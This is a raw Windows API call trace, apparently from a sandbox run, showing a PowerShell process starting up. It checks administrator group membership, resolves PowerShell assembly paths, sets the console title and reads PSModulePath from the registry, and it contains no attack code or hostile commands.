	[0480.672] GetTokenInformation (in: TokenHandle=0x19c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1adb98 | out: TokenInformation=0x0, ReturnLength=0x1adb98) returned 0
	[0480.673] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3b7290
	[0480.673] GetTokenInformation (in: TokenHandle=0x19c, TokenInformationClass=0x8, TokenInformation=0x3b7290, TokenInformationLength=0x4, ReturnLength=0x1adb98 | out: TokenInformation=0x3b7290, ReturnLength=0x1adb98) returned 1
	[0480.674] DuplicateTokenEx (in: hExistingToken=0x19c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1adcf8 | out: phNewToken=0x1adcf8*=0x194) returned 1
	[0480.674] GetTokenInformation (in: TokenHandle=0x19c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1adb98 | out: TokenInformation=0x0, ReturnLength=0x1adb98) returned 0
	[0480.675] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3b72c0
	[0480.675] GetTokenInformation (in: TokenHandle=0x19c, TokenInformationClass=0x8, TokenInformation=0x3b72c0, TokenInformationLength=0x4, ReturnLength=0x1adb98 | out: TokenInformation=0x3b72c0, ReturnLength=0x1adb98) returned 1
	[0480.676] CheckTokenMembership (in: TokenHandle=0x194, SidToCheck=0x2e3d768*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1add08 | out: IsMember=0x1add08) returned 1
	[0480.676] CloseHandle (hObject=0x194) returned 1
	[0480.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0480.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0480.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0480.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0481.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0481.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0481.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0481.644] CoTaskMemAlloc (cb=0x804) returned 0x1b832520
	[0481.644] GetConsoleTitleW (in: lpConsoleTitle=0x1b832520, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0481.645] CoTaskMemFree (pv=0x1b832520) 
	[0482.562] CoTaskMemAlloc (cb=0x804) returned 0x1b832dd0
	[0482.562] GetConsoleTitleW (in: lpConsoleTitle=0x1b832dd0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0482.562] CoTaskMemFree (pv=0x1b832dd0) 
	[0482.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0482.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0482.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0482.566] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0484.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0484.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0484.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0484.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0485.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0485.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0485.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0485.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0485.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0485.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0485.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0485.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0485.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0485.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0487.310] CoCreateGuid (in: pguid=0x1addf0 | out: pguid=0x1addf0*(Data1=0x1a95fcad, Data2=0x9220, Data3=0x43cc, Data4=([0]=0x87, [1]=0xab, [2]=0x82, [3]=0xeb, [4]=0xa1, [5]=0x4e, [6]=0x81, [7]=0x44))) returned 0x0
	[0487.311] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0487.311] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0487.312] CoTaskMemFree (pv=0x4344f0) 
	[0487.330] WinSqmIsOptedIn () returned 0x0
	[0487.331] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0487.331] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0487.331] CoTaskMemFree (pv=0x4344f0) 
	[0488.156] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0488.156] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0488.156] CoTaskMemFree (pv=0x4344f0) 
	[0488.156] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0488.156] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0488.156] CoTaskMemFree (pv=0x4344f0) 
	[0488.157] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0488.157] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0488.157] CoTaskMemFree (pv=0x4344f0) 
	[0488.158] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0488.158] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0488.158] CoTaskMemFree (pv=0x4344f0) 
	[0488.159] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0488.159] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0488.159] CoTaskMemFree (pv=0x4344f0) 
	[0488.159] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0488.159] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0488.159] CoTaskMemFree (pv=0x4344f0) 
	[0488.160] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0488.160] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0488.160] CoTaskMemFree (pv=0x4344f0) 
	[0488.162] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0488.162] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0488.162] CoTaskMemFree (pv=0x4344f0) 
	[0488.166] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0488.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0488.166] CoTaskMemFree (pv=0x4344f0) 
	[0488.166] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0488.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0488.166] CoTaskMemFree (pv=0x4344f0) 
	[0488.167] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0488.167] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0488.167] CoTaskMemFree (pv=0x4344f0) 
	[0489.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0489.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0489.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0489.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0490.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0491.483] CoTaskMemAlloc (cb=0x104) returned 0x4344f0
	[0491.483] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x4344f0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0491.483] CoTaskMemFree (pv=0x4344f0) 
	[0491.485] CoTaskMemAlloc (cb=0xcc) returned 0x1b82c170
	[0491.485] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b82c170, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0491.485] CoTaskMemFree (pv=0x1b82c170) 
	[0491.485] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad968 | out: phkResult=0x1ad968*=0x318) returned 0x0
	[0491.485] RegQueryValueExW (in: hKey=0x318, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ad8ec, lpData=0x0, lpcbData=0x1ad8e8*=0x0 | out: lpType=0x1ad8ec*=0x2, lpData=0x0, lpcbData=0x1ad8e8*=0x6c) returned 0x0
	[0491.485] CoTaskMemAlloc (cb=0x70) returned 0x3f0370
	[0491.485] RegQueryValueExW (in: hKey=0x318, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ad8bc, lpData=0x3f0370, lpcbData=0x1ad8b8*=0x6c | out: lpType=0x1ad8bc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x1ad8b8*=0x6c) returned 0x0
	[0491.485] CoTaskMemFree (pv=0x3f0370) 
	[0491.485] CoTaskMemAlloc (cb=0xcc) returned 0x1b82c170
	[0491.485] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b82c170, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0491.485] CoTaskMemFree (pv=0x1b82c170) 
	[0491.485] CoTaskMemAlloc (cb=0xcc) returned 0x1b82c170
	[0491.485] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b82c170, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0491.486] CoTaskMemFree (pv=0x1b82c170) 
	[0491.489] RegCloseKey (hKey=0x318) returned 0x0
	[0491.489] CoTaskMemAlloc (cb=0xcc) returned 0x1b82c170
	[0491.489] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b82c170, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0491.490] CoTaskMemFree (pv=0x1b82c170) 
	[0491.490] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad968 | out: phkResult=0x1ad968*=0x318) returned 0x0
